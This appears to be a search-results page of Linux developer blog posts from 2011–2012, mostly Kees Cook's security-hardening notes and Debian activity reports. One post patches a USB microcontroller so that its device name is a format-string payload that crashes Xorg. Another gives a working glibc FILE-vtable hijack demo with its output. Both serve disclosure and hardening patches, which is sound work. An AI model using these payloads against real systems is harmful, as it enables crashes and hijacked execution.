Search Results: "Kees Cook"

16 May 2012

Kees Cook: USB AVR fun

At the recent Ubuntu Developer Summit, I managed to convince a few people (after assurances that there would be no permanent damage) to plug a USB stick into their machines so we could watch Xorg crash and wedge their console. What was this evil thing, you ask? It was an AVR microprocessor connected to USB, acting as a USB HID Keyboard, with the product name set to %n . Recently a Chrome OS developer discovered that renaming his Bluetooth Keyboard to %n would crash Xorg. The flaw was in the logging stack, triggering glibc to abort the process due to format string protections. At first glance, it looks like this isn t a big deal since one would have to have already done a Bluetooth pairing with the keyboard, but it would be a problem for any input device, not just Bluetooth. I wanted to see this in action for a normal (USB) keyboard. I borrowed a Maximus USB AVR from a friend, and then ultimately bought a Minimus. It will let you put anything you want on the USB bus. I added a rule for it to udev:
SUBSYSTEM=="usb", ACTION=="add", ATTR idVendor =="03eb", ATTR idProduct =="*", GROUP="plugdev"
installed the AVR tools:
sudo apt-get install dfu-programmer gcc-avr avr-libc
and pulled down the excellent LUFA USB tree:
git clone git://github.com/abcminiuser/lufa-lib.git
After applying a patch to the LUFA USB keyboard demo, I had my handy USB-AVR-as-Keyboard stick ready to crash Xorg:
-       .VendorID               = 0x03EB,
-       .ProductID              = 0x2042,
+       .VendorID               = 0x045e,
+       .ProductID              = 0x000b,
...
-       .UnicodeString          = L"LUFA Keyboard Demo"
+       .UnicodeString          = L"Keyboard (%n%n%n%n)"
In fact, it was so successfully that after I got the code right and programmed it, Xorg immediately crashed on my development machine. :)
make dfu
After a reboot, I switched it back to programming mode by pressing and holding the H button, press/releasing the R button, and releasing H . The fix to Xorg is winding its way through upstream, and should land in your distros soon. In the meantime, you can disable your external USB ports, as Marc Deslauriers demonstrated for me:
echo "0" > /sys/bus/usb/devices/usb1/authorized
echo "0" > /sys/bus/usb/devices/usb1/authorized_default
Be careful of shared internal/external ports, and having two buses on one port, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

26 March 2012

Kees Cook: keeping your process unprivileged

One of the prerequisites for seccomp filter is the new PR_SET_NO_NEW_PRIVS prctl from Andy Lutomirski. If you re not interested in digging into creating a seccomp filter for your program, but you know your program should be effectively a leaf node in the process tree, you can call PR_SET_NO_NEW_PRIVS (nnp) to make sure that the current process and its children can not gain new privileges (like through running a setuid binary). This produces some fun results, since things like the ping tool expect to gain enough privileges to open a raw socket. If you set nnp to 1 , suddenly that can t happen any more. Here s a quick example that sets nnp, and tries to run the command line arguments:
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif
int main(int argc, char * argv[])
 
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))  
                perror("prctl(NO_NEW_PRIVS)");
                return 1;
         
        return execvp(argv[1], &argv[1]);
 
When it tries to run ping, the setuid-ness just gets ignored:
$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted
So, if your program has all the privs its going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

23 March 2012

Kees Cook: seccomp filter now in Ubuntu

With the generous help of the Ubuntu kernel team, Will Drewry s seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly. One of the questions I ve been asked by several people while they developed policy for earlier mode 2 seccomp implementations was How do I figure out which syscalls my program is going to need? To help answer this question, and to show a simple use of seccomp filter, I ve written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file ( seccomp-bpf.h ) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet. Read more in the seccomp filter tutorial. Enjoy!

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

15 February 2012

Kees Cook: discard, hole-punching, and TRIM

Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as no longer allocated . In the standard view, here s what happens if you fill a file to 500M and then truncate it to 100M, using the truncate syscall:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details to block device.
The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (And to a certain extent is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem about this lack of information for the block device is that some devices (like SSDs) could use this information to their benefit to help with extending their life, etc. To support this, the TRIM set of commands were created so that a block device could be informed when blocks were released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is discard intent, which is translated into the needed TRIM commands. So now, when discard notification is enabled for a filesystem (e.g. mount option discard for ext4), the earlier example looks like this:
  1. create the empty file, filesystem allocates an inode, writes accounting details to block device.
  2. write data to file, filesystem allocates and fills data blocks, writes blocks to block device.
  3. truncate the file to a smaller size, filesystem updates accounting details and releases blocks, writes accounting details and sends discard intent to block device.
While SSDs can use discard to do fancy SSD things, there s another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to punch a hole back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard was enabled for a filesystem, these punched holes would get passed down to the block device as well. Take, for example, a qemu/KVM VM running on a disk image that was built from a sparse file. While inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that had been allocated so far. In the instance, if you wrote 8G worth of temporary data, and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it s now possible for the filesystem in the VM to issue discards to the block driver, and then qemu could issue hole-punching requests to the sparse file backing the image, and all of that 8G would get freed again. The only down side is that each layer needs to correctly translate the requests into what the next layer needs. With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on SSD. If a file is deleted at the top, it ll pass all the way down, discarding allocated blocks all the way to the SSD: Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with allow_discards ) on it:
# cd /root
# truncate -s10G test.block
# ls -lk test.block
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase"   sha256sum   awk ' print $1 ')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"
Now build an ext4 filesystem on it. This enables discard during mkfs, and disables lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount-time to finish, and mount it with the discard option:
# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 
# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block
Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:
# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block
Nearly all the space was reclaimed after the file was deleted. Yay! Note that the Linux tmpfs filesystem does not yet support hole punching, so the exampe above wouldn t work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10 February 2012

Kees Cook: kvm and product_uuid

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (same as dmidecode s System Information / UUID ), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the -uuid option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.
host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid
12345678-ABCD-1234-ABCD-1234567890AB

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

22 January 2012

Kees Cook: fixing vulnerabilities with systemtap

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily: Still, it s a cross-architecture local root escalation on most common installations. Don t stop reading just because you don t have a local user base attackers can use this to elevate privileges from your user, or from the web server s user, etc. Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you re waiting for your distribution s kernel update, you can use systemtap to change your kernel s running behavior. RedHat suggested this, and here s how to do it in Debian and Ubuntu: In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability. UPDATE: here s a systemtap script from Soren that doesn t require the full debug symbols. Sneaky, put can be rather slow since it hooks all writes in the system. :)

2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

16 January 2012

Rapha&#235;l Hertzog: Review of my Debian related goals for 2011

Last year I shared my Debian related goals for 2011 . I tend to put more goals than what I can reasonably complete alone and this year was no exception. Let s have a look.
  1. Translate my Debian book into English: PARTLY DONE
    It took more time than expected to prepare and to run the fundraising campaign but it has been successful and the translation is happening right now.
  2. Finish multiarch support in dpkg: DONE BUT NOT ENTIRELY MERGED YET
    Yes, multiarch support was already in the pipe last year in January. I completed the development between January and April (it was sponsored by Linaro) and since then it has mostly been waiting on Guillem to review it, tweak it, and integrate it.
  3. Make deb files use XZ compression by default: TRIED BUT ABANDONED
    After discussing the issue with Colin Watson and Joey Hess during debconf, I came to the conclusion that it was not really desirable at this point. The objections were that debian-installer was not ready for it and that it adds a new dependency on xz for debootstrap to work on non-Debian systems. I believe that the debian-installer side is no longer a problem since unxz is built in busybox-udeb (since version 1:1.19.3-2). For the other side, there s not much to do except ensuring that xz is portable to all the other OS we care about. DAK has been updated too (see #556407).
  4. Be more reactive to review/merge dpkg patches: PARTLY DONE
    I don t think we had any patch that received zero input. We still have a backlog of patches, and the situation is far from ideal but the situation improved.
  5. Implement the rolling distribution proposed as part of the CUT project and try to improve the release process: NOT DONE
    We had a BoF during debconf, we discussed it at length on debian-devel, but in the end we did nothing out of it. Except Josselin Mouette who wrote a proof of concept for his idea. For me testing is already what people are expecting from a rolling distribution. It s just a matter of documenting how to effectively use testing, and of some marketing by defining rolling as alias to testing.
  6. Work more regularly on the developers-reference: PARTLY DONE
    I did contribute some new material to the document but not as much as I could have hoped. On the other hand, I have been rather reactive to ensure that sane patches got merged. We need more people writing new parts and updating the existing content.
  7. Write a 10-lesson course called Smart Package Management : NOT DONE
  8. Create an information product (most likely an ebook or an online training) and sell it on my blog: NOT DONE
    This was supposed to happen after the translation of the Debian Administrator s Handbook. Since the translation is not yet over, I did not start to work on this yet.
  9. By the end of the year, have at least 1/3 of my time funded by donations and/or earnings of my information products: NOT REACHED
    My target was rather aggressive with 700 each month, and given that I did not manage to complete any information product, I m already very pleased to have achieved a mean amount of 204 of donations each month (min: 91 , max: 364 ). It s more than two times better than in 2010. Thank you! Note that those figures do not take into account the revenues of the fundraising of the Debian Administrator s Handbook since they will be used for its translation.
That makes quite a lot of red (for things that I did not achieve) on the other hand I completed projects that I did not foresee and did not plan. For instance improving dpkg-buildflags and then merging Kees Cook work on hardened build flags was an important step for Debian. This was waiting for so long already

2 comments Liked this article? Click here. My blog is Flattr-enabled.

3 January 2012

Rapha&#235;l Hertzog: My Debian Activities in December 2011

This is my monthly summary of my Debian related activities. If you re among the people who made a donation to support my work (364.18 , thanks everybody!), then you can learn how I spent your money. Otherwise it s just an interesting status update on my various projects. Dpkg and Multiarch I had some hope to have a multiarch-enabled dpkg in sid for Christmas as Guillem told me that it was realistic. Alas Guillem got sick. We re in January and we re still not there. While some of Guillem s commits in December were related to multi-arch, the size of his pu/multiarch/master branch did not really shrink. We still have 36 commits to merge most of the work he did was refactoring some parts of the code that were already merged. And he initiated some discussion on interface changes. I participated to those discussions hoping to bring them to a quick resolution. I m still maintaining my own pu/multiarch/full branch, it is based on Guillem s branch but with further fixes that I developed and that he has not yet merged and with a change reverted (Guillem s branch allows crossgrading packages between different architectures while dpkg does not manage this correctly yet). I can only hope that January will be the last month of this never-ending saga. It s been one year since I started working on this project. :- Misc dpkg work I reviewed (and later merged) a patch of Kees Cook to enhance dpkg-buildflags so that it can report which hardening features are enabled. This feature might then be used by tools like lintian to detect missing hardening features. I mentored Gianluca Ciccarelli who is trying to enhance dpkg-maintscript-helper to take care of replacing a directory by a symlink and vice-versa. I took care of #651993 so that dpkg-mergechangelogs doesn t fail when it encounters an invalid version in the changelog, and of #652414 so that dpkg-source --commit accepts a relative filename when a patch file is explicitly given. Guillem also merged a fix I developed for LP#369898. Packaging work WordPress 3.3 came out so I immediately packaged it. Despite my upstream bug report, they did not update their GPL compliance page which offers the corresponding sources for what s bundled in the tarball. So I hunted for the required sources myself, and bundled them in the debian.tar.xz of the Debian source package. It s a rather crude solution but this allowed me to close the release critical bug #646729 and to reintroduce the Flash files that were dropped in the past which is great since the Flash-based file uploader is nicer than the one using the browser s file field. Quilt 0.50 came out after 2 years of (slow) development. The Debian package has many patches and several of them had to be updated to cope with the new upstream release. Fortunately some of them were also merged upstream. It still took an entire morning to complete this update. I also converted the packaging from CDBS to dh with a short rules file. Zim 0.54 came out and I immediately updated the package since it fixed a bug that was annoying me. Review of the ledgersmb packaging As the sql-ledger maintainer (and a user of this software for my accounting), I have been hoping to get ledgersmb packaged as a possible replacement for it. I have been following the various efforts initiated over time but none of them resulted in a real package in Debian. This is a real pity so I tried to fix this by offering to sponsor package uploads. That s why I did a first review of the packaging. It took several hours because you have to explain everything that s not good enough. I also filed a wishlist bug against lintian (#652963) to suggest that lintian should detect improper usage of dpkg-statoverride (this is a mistake that was present in the package that I reviewed). nautilus-dropbox work I wanted to polish the package in time for the Ubuntu LTS release and since Debian Import Freeze is in January, I implemented some of the important fixes that I wanted. The Debian package diverges from upstream in that the non-free binaries are installed in /var/lib/dropbox/ instead of $HOME.
Due to a bug, the files were not properly root-owned so I first fixed this (unpacking the tarball as root lead to reuse of the embedded user & group information, and those information changed recently on the Dropbox side apparently). Then we recently identified other problems related to proxy handling (see #651065). I fixed this too because it s relatively frequent that the initial download triggered during the package configuration fails and in that case it s the user that will re-trigger a package download after having given the appropriate credentials through PackageKit. Without my fix, usage of pkexec would imply the loss of the http_proxy environment variable and thus it would not be possible for a user to download through a proxy. Last but not least I reorganized the Debian specific patches to better separate what can and should be merged upstream, from the changes that upstream doesn t want. Unfortunately Dropbox insists on being able to auto-update their non-free binaries, they are, thus, against the installation under /var/lib/dropbox and the corresponding changes. Book update We re making decent progress in the translation of the Debian Administrator s Handbook, about 6 chapters are already translated (not yet reviewed though). The liberation campaign is also (slowly) going forward. We re at 67% now (thanks to 90 new supporters!) while we were only at 60% at the start of December. Thanks See you next month for a new summary of my activities.

No comment Liked this article? Click here. My blog is Flattr-enabled.

23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with stream functions (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What s interesting is that this isn t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have: glibc FILE vtable location In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn t protected the FILE structure in the same way. I m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven t overlooked something, since I d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here s a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
 
    printf("Dave, my mind is going.\n");
    fflush(stdout);
 
void * funcs[] =  
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
 ;
int main(int argc, char * argv[])
 
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r")))  
        perror("fopen");
        return 1;
     
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    fclose(fp);
    return 0;
 
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I d like to see this fixed too, but it ll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

7 December 2011

Kees Cook: how to throw an EC2 party

Prepare a location to run juju and install it:
mkdir ~/party
cd ~/party
sudo apt-get install juju
Initialize your juju environment. Be sure to add juju-origin: ppa to your environment, along with filling in your access-key and secret-key from your Amazon AWS account. Note that control-bucket and admin-secret should not be used by any other environment or juju won t be able to distinguish them. Other variables are good to set now too. I wanted my instances close to me, use I set region: us-west-1 . I also wanted a 64bit system, so using the AMI list, I chose default-series: oneiric , default-instance-type: m1.large and default-image-id: ami-7b772b3e
juju
$EDITOR ~/.juju/environments.yaml
Get my sbuild charm, and configure some types of builders. The salt should be something used only for this party; it is used to generate the random passwords for the builder accounts. The distro and releases can be set to whatever the mk-sbuild tool understands.
bzr co lp:~kees/charm/oneiric/sbuild/trunk sbuild-charm
cat >local.yaml <<EOM
builder-debian:
    salt: some-secret-phrase-for-this-party
    distro: debian
    releases: unstable
builder-ubuntu:
    salt: some-secret-phrase-for-this-party
    distro: ubuntu
    releases: precise,oneiric
EOM
Bootstrap juju and wait for ec2 instance to come up.
juju bootstrap
Before running the status, you can either accept the SSH key blindly, or use ec2-describe-instances to find the instance and public host name, and use my wait-for-ssh tool to inject the SSH host key into your ~/.ssh/known_hosts file. This requires having set up the environment variables needed by ec2-describe-instances , though.
ec2-describe-instances --region REGION
./sbuild-charm/wait-for-ssh INSTANCE HOST REGION
Get status:
juju status
Deploy a builder:
juju deploy --config local.yaml --repository $PWD local:sbuild-charm builder-debian
Deploy more of the same type:
juju add-unit builder-debian
juju add-unit builder-debian
juju add-unit builder-debian
Now you have to wait for them to finish installing, which will take a while. Once they re at least partially up (the builder user has been created), you can print out the slips of paper to hand out to your party attendees:
./sbuild-charm/slips   mpage -1 > /tmp/slips.ps
ps2pdf /tmp/slips.ps /tmp/slips.pdf
They look like this:
Unit: builder-debian/3
Host: ec2-256-1-1-1.us-west-1.compute.amazonaws.com
SSH key fingerprints:
  1024 3e:f7:66:53:a9:e8:96:c7:27:36:71:ce:2a:cf:65:31 (DSA)
  256 53:a9:e8:96:c7:20:6f:8f:4a:de:b2:a3:b7:6b:34:f7 (ECDSA)
  2048 3b:29:99:20:6f:8f:4a:de:b2:a3:b7:6b:34:bc:7a:e3 (RSA)
Username: builder
Password: 68b329da9893
To admin the machines, you can use juju itself, where N is the machine number from the juju status output:
juju ssh N
To add additional chroots to the entire builder service, add them to the config:
juju set builder-debian release=unstable,testing,stable
juju set builder-ubuntu release=precise,oneiric,lucid,natty
Notes about some of the terrible security hacks this charm does: Enjoy!

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

Kees Cook: juju bug fixing

My earlier post on juju described a number of weird glitches I ran into. I got invited by hazmat on IRC (freenode #juju) to try to reproduce the problems so we could isolate the trouble. Fix #1: use the version from the PPA. The juju setup documentation doesn t mention this, but it seems that adding juju-origin: ppa to your ~/.juju/environment.yaml is a good idea. I suggest it be made the default, and to link to the full list of legal syntax for the environment.yaml file. I was not able to reproduce the missing-machines-at-startup problem after doing this, but perhaps it s a hard race to lose. Fix #2: don t use terminate-machine . :P There seems to be a problem around doing the following series of commands: juju remove-unit FOO/N; juju terminate-machine X; juju add-unit FOO . This makes the provisioner go crazy, and leaves all further attempts to add units stick in pending forever. Big thank you to hazmat and SpamapS for helping debug this.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

6 December 2011

Steve Langasek: Making jam from bugs

This weekend, we held a combined Debian Bug Squashing Party and Ubuntu Local Jam in Portland, OR. A big thank you to PuppetLabs for hosting! Thanks to a brilliant insight from Kees Cook, we were able to give everyone access to their own pre-configured build environment as soon as they walked in the door by deploying schroot/sbuild instances in "the cloud" (in this case, Amazon EC2). Small blips with the mirrors notwithstanding, this worked out pretty well, and let people start to get their hands dirty as soon as they walked in the door instead of spending a lot of time up front doing the boring work of setting up a build environment. This was a big win for people who had never done a package build before, and I highly recommend it for future BSPs. You can read about the build environment setup in the Debian wiki, and details on setting up your own BSP cloud in Kees's blog. (And the cloud instances were running Ubuntu 11.10 guests, with Debian unstable chroots - a perfect pairing for our joint Debian/Ubuntu event!) So how did this curious foray into a combined Ubuntu/Debian event go? Not too shabby: When all was said and done, we didn't get a chance to tackle any wheezy release critical bugs like we'd hoped. That's ok, that leaves us something to do for our next event, which will be bigger and even better than this one. Maybe even big enough to rival one of those crazy, all-weekend BSPs that they have in Germany...

Kees Cook: EC2 instances in support of a BSP

On Sunday, I brought up EC2 instances to support the combined Debian Bug Squashing Party/Ubuntu Local Jam that took place at PuppetLabs in Portland, OR, USA. The intent was to provide each participant with their own sbuild environment on a 64bit machine, since we were going to be working on Multi-Arch support, and having both 64bit and 32bit chroots would be helpful. The host was an Ubuntu 11.10 (Oneiric) instance so it would be possible to do SRU verifications in the cloud too. I was curious about the juju provisioning system, since it has an interesting plugin system, called charms , that can be used to build out services. I decided to write an sbuild charm, which was pretty straight forward and quite powerful (using this charm it would be possible to trigger the creation of new schroots across all instances at any time, etc). The juju service itself works really well when it works correctly. When something goes wrong, unfortunately, it becomes nearly impossible to debug or fix. Repeatedly while working on charm development, the provisioning system would lose its mind, and I d have to destroy the entire environment and re-bootstrap to get things running again. I had hoped this wouldn t be the case while I was using it during production on Sunday, but the provisioner broke spectacularly on Sunday too. Due to the fragility of the juju agents, it wasn t possible to restart the provisioner it lost its mind, the other agent s couldn t talk to it any more, etc. I would expect the master services on a cloud instance manager to be extremely robust since having it die would mean totally losing control of all your instances. On Sunday morning, I started 8 instances. 6 came up perfectly and were excellent work-horses all day at the BSP. 2 never came up. The EC2 instances started, but the service provisioner never noticed them. Adding new units didn t work (instances would start, but no services would notice them), and when I tried to remove the seemingly broken machines, the instance provisioner completely went crazy and started dumping Python traces into the logs (which seems to be related to this bug, though some kind of race condition seems to have confused it much earlier than this total failure), and that was it. We used the instances we had, and I spent 3 hours trying to fix the provisioner, eventually giving up on it. I was very pleased with EC2 and Ubuntu Server itself on the instances. The schroots worked, sbuild worked (though I identified some additional things that the charm should likely do for setup). I think juju has a lot of potential, but I m surprised at how fragile it is. It didn t help that Amazon had rebooted the entire West Coast the day before and there were dead Ubuntu Archive Mirrors in the DNS rotation. For anyone else wanting to spin up builders in the cloud using juju, I have a run-down of what this looks like from the admin s perspective, and even include a little script to produce little slips of paper to hand out to attendees with an instance s hostname, ssh keys, and builder SSH password. Seemed to work pretty well overall; I just wish I could have spun up a few more. :) So, even with the fighting with juju and a few extra instances that came up and I had to shut down again without actually using them, the total cost to run the instances for the whole BSP was about US$40, and including the charm development time, about US$45. UPDATE: some more details on how to avoid the glitches I hit.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

5 December 2011

Kees Cook: PGP key photo viewing

Handy command line arguments for gpg:
gpg --list-options show-photos --fingerprint 0xdc6dc026
This is nice to examine someone s PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings). If gpg doesn t pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

12 September 2011

Kees Cook: 5 years with Canonical

This month, I will have been with Canonical for 5 years. It s been fantastic, but I ve decided to move on. Next week, I m going to start working for Google, helping out with ChromeOS, which I m pretty excited about. I m sad to be leaving Canonical, but I comfort myself by knowing that I m not leaving Ubuntu or any other projects I m involved in. I believe in Ubuntu, I use it everywhere, and I m friends with so many of its people. And I m still core-dev, so I ll continue to break^Wsecure things as much as I can in Ubuntu, and continue working on getting similar stuff into Debian. :) For nostalgic purposes, I dug up my first security update (sponsored by pitti), and my first Ubuntu Security Notice. I m proud of Ubuntu s strong security record and how far the security feature list has come. The Ubuntu Security Team is an awesome group of people, and I m honored to have worked with them. I m looking forward to the new adventures, but I will miss the previous ones.

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

4 September 2011

Rapha&#235;l Hertzog: My Debian activities in August 2011

This is my monthly summary of my Debian related activities. If you re among the people who made a donation to support my work (91.44 , thanks everybody!), then you can learn how I spent your money. Otherwise it s just an interesting status update on my various projects. Dpkg work When I came back from Debconf, I merged my implementation of dpkg-source --commit (already presented last month). I continued some work on the hardening build flags but it s currently stalled waiting on Kees Cook to provide the required documentation to integrate in dpkg-buildflags(1). Following a discussion held during DebConf, Michael Prokop has been kind enough to setup a git-triggered auto-builder of dpkg (using Jenkins). You can now help us by testing the latest git version. Follow those instructions:
$ wget -O - http://jenkins.grml.org/debian/C525F56752D4A654.asc   sudo apt-key add -
$ sudo sponge /etc/apt/sources.list.d/dpkg-git <<END
deb http://jenkins.grml.org/debian dpkg main
END
$ sudo apt-get update && sudo apt-get upgrade
On the bug fixing side I took care of #640198 (minor man page update), #638291 (a fix to correctly handle hardlinks of conffiles), #637564 (the simplification logic of union dependencies was broken in some cases) and #631494 (interrupting dpkg-source while building a native source package left some temporary files around that should have been cleaned). WordPress update I released WordPress 3.2.1 in unstable (after having taken the time to test the updated package on my blog!) and fixed its RC bug (#625773). In the process I discovered a false positive in lintian (I reported it in 637473). Gnome-shell-timer package From time to time, I like to use the Pomodoro Technique. That s why I was an user of timer-applet in GNOME 2. Now with the switch to GNOME 3, I lost this feature. But I recently discovered gnome-shell-timer, a GNOME Shell extension that provides the same features. I created a Debian package of it and quickly filed some bugs while I was testing it (two usability issues and an encoding problem) QA Work During DebConf I met Giovanni Mascellani and he was interested to help the QA team. He started working on the backlog of bugs concerning the Package Tracking System (PTS) and submitted a bunch of patches. I reviewed them and merged them but since they were good, I quickly got lazy and got him added to the QA team so that he can commit his fixes alone. It also helps to build trust when you have had the opportunity to discuss face to face. :-) Vacation That s not so much compared to usual but to my defense I also took 2 weeks of vacation with my family. But somehow even in vacation I can t really forget Debian. Here s my son:
Thanks See you next month for a new summary of my activities.

3 comments Liked this article? Click here. My blog is Flattr-enabled.

4 August 2011

Rapha&#235;l Hertzog: My Debian activities in July 2011

